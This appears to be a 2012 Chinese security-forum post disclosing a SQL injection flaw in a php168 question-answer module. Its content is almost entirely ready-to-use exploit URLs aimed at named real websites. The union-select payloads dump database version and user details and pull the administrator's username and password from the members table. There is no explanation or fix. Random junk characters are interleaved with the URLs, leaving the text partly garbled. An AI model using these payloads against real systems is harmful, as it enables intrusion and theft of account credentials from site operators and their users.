找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3121|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--+ G& y* i6 w/ i/ |0 j9 D2 L! r
                                                         $ o+ U. y+ W/ _; n1 G5 y
                                       ! w1 I: A; c5 c+ Q, Z
$ i4 F3 |! G* p; p- O6 q( M
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--1 n" a/ V; V3 w6 E$ K) F3 X' q' U: x6 w
                                                     + k! @, ]" Q3 b; Y: z, d4 E8 N& s
                                                                  
& v, P) e+ N( j( b; \7 D                                                        8 o9 O. e0 D! @, i7 d
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--) f* I% d+ n1 Q5 p. Y& c7 H
- O2 R0 s2 r4 f4 _8 U# J
% C1 Y$ d7 z) \- u% E8 k
) R& ~) @% k4 S* ~% O9 B( X
                                                            * Q; W& D3 v+ z9 |
; e9 R% Z  T" H$ F  V- R, K
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--# ]1 j* m* D5 M% M" \( d
2 h; a! G" i# L$ @
6 R6 j4 O! U5 u2 E7 S

0 C, Z/ d, u7 U$ M                                                                    
1 P6 {- |3 P# b9 f$ o" Q+ o! C

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表